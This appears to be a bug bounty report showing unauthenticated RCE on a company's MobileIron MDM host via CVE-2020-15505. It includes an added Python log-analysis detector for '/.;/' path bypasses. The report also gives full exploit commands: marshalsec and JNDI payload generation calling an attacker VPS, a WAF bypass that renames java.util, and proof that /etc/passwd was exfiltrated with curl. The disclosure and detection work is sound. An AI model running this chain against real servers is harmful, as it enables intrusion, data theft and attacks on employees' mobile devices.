Last week, details about 3 CVEs affecting the MobileIron MDM product were disclosed. When combined, they allow an attacker to achieve unauthenticated remote code execution through an arbitrary Java deserialization vector:

- CVE-2020-15505 - Remote Code Execution
- CVE-2020-15506 - Authentication Bypass
- CVE-2020-15507 - Arbitrary File Reading
The following blog post discloses the issues: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
The following GitHub repo is a working PoC to reproduce the issues: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
The advisory from the vendor can be found here: https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
Code execution is achieved through arbitrary Java deserialization using the Hessian protocol. The /mifs/services/LogService endpoint performs such deserialization. Authentication is required, but it can be bypassed with /.;/ (/mifs/.;/services/LogService).
Use the following check to determine if a host is vulnerable:
curl "<HOST>/mifs/.;/services/LogService" -k -s | grep -q 'This method/operation is not allowed.' && echo "<HOST> - Vulnerable"
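From a defender's side, the useful signal is not the Hessian payload (a WAF matching class-name strings is exactly what the report later shows being sidestepped) but the request path itself: a `;` path parameter such as `/.;/` that makes the raw path differ from the path the servlet container ends up serving. The script below is an added example, not part of the original report or the PoC repo. It normalizes request paths the way Tomcat-style containers treat `;` path parameters (stripping them per segment, then collapsing `.` and `..`) and flags access-log lines whose normalized path reaches the LogService endpoint only through such a bypass. The log lines are constructed samples; `LOG_RE`, `normalize_path` and `analyze_log` are names chosen for this example.

```python
import re
from urllib.parse import urlsplit

# Constructed sample access-log lines in a Tomcat/Apache common-log shape.
# The IPs, timestamps and sizes are made up for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Oct/2020:10:00:01 +0000] "POST /mifs/services/LogService HTTP/1.1" 401 0
10.0.0.9 - - [01/Oct/2020:10:00:02 +0000] "POST /mifs/.;/services/LogService HTTP/1.1" 200 312
10.0.0.9 - - [01/Oct/2020:10:00:03 +0000] "GET /mifs/.;/services/LogService HTTP/1.1" 200 48
10.0.0.7 - - [01/Oct/2020:10:00:04 +0000] "GET /mifs/c/d/ HTTP/1.1" 200 1024
10.0.0.8 - - [01/Oct/2020:10:00:05 +0000] "POST /mics/.;/services/LogService HTTP/1.1" 200 300
"""

# Minimal common-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The deserializing endpoint named in the report; the leading context
# (/mifs or /mics) is recovered from the normalized path.
SENSITIVE_SUFFIX = "/services/LogService"


def normalize_path(raw_path):
    """Approximate the container's view of a request path.

    Each segment loses anything after ';' (a path parameter), then '.' and
    '..' segments are collapsed. This is why '/mifs/.;/services/LogService'
    is served as '/mifs/services/LogService' even though a front-end filter
    comparing against the raw string does not see that prefix.
    """
    out = []
    for seg in raw_path.split("/"):
        seg = seg.split(";", 1)[0]  # strip path parameters such as '.;'
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def is_path_parameter_bypass(raw_path):
    """True when ';' path parameters change the effective path."""
    return ";" in raw_path and normalize_path(raw_path) != raw_path


def analyze_log(text):
    """Return findings for requests that reach the LogService endpoint via a
    path-parameter bypass, regardless of what the request body contained."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not parse rather than failing
        raw_path = urlsplit(m.group("target")).path  # urlsplit keeps ';' intact
        if not is_path_parameter_bypass(raw_path):
            continue
        norm = normalize_path(raw_path)
        if norm.endswith(SENSITIVE_SUFFIX):
            findings.append({
                "ip": m.group("ip"),
                "method": m.group("method"),
                "raw_path": raw_path,
                "normalized_path": norm,
                "status": int(m.group("status")),
                "context": norm.split("/")[1],  # 'mifs' (tomcat) or 'mics' (possibly root)
            })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['raw_path']} -> {f['normalized_path']} "
              f"[{f['context']}] status={f['status']}")
```

Because the rule keys on the path-normalization mismatch rather than on strings inside the serialized object, the `java.util` to `javb.util` substitution described later in the report does not affect it; the same normalization can be applied at a reverse proxy to reject any request whose raw path and normalized path disagree before it reaches the application.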
I've discovered that mdm.qiwi.com is vulnerable. The MDM User enrollment interface is reachable on https://mdm.qiwi.com F990294
A WAF is protecting this host and thus blocks out-of-the-box exploit code. It matches and blocks requests containing the names of essential Java classes found in the serialized object, such as java.lang / java.io / java.util: F990300 F990301
The exploitation uses the code hosted in the following repo: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
The steps are mostly identical. This exploit uses a JNDI-based attack with an RMI server running on my VPS.
The final JNDI exploit contains only one string that triggers the WAF: java.util F990309
I've managed to bypass the WAF without breaking the exploit code by replacing it with javb.util F990356
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C <COMMAND>
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<VPS_IP>/<REFERENCE> | sed -b 's/java\.util/javb.util/' > exp_rmi_qiwi
python hessian.py -u "https://mdm.qiwi.com/mifs/.;/services/LogService" -p exp_rmi_qiwi
Here are some proofs of my exploitation attempts to validate effective RCE:

- Simple curl ping back
- Curl leaking /etc/passwd: F990327 F990328
- Curl leaking /etc/resolv.conf: F990330 F990331 F990332
The curl user-agent is:
curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.27.1 zlib/1.2.3 libidn/1.18 libssh2/1.4.2
And the requests came from IP
Since we are exploiting the /mifs/ interface, all commands are executed as tomcat. If the Management interface (/mics/) were exploited through this vulnerability, the commands may be executed as the root user (depending on the version of MobileIron).
By executing arbitrary commands on the server, an attacker can compromise the integrity, availability and confidentiality of the server's data and also pivot to other servers on the internal network.
Since this server is running an MDM product, an attacker could compromise it to attack Qiwi employees and/or compromise their mobile devices.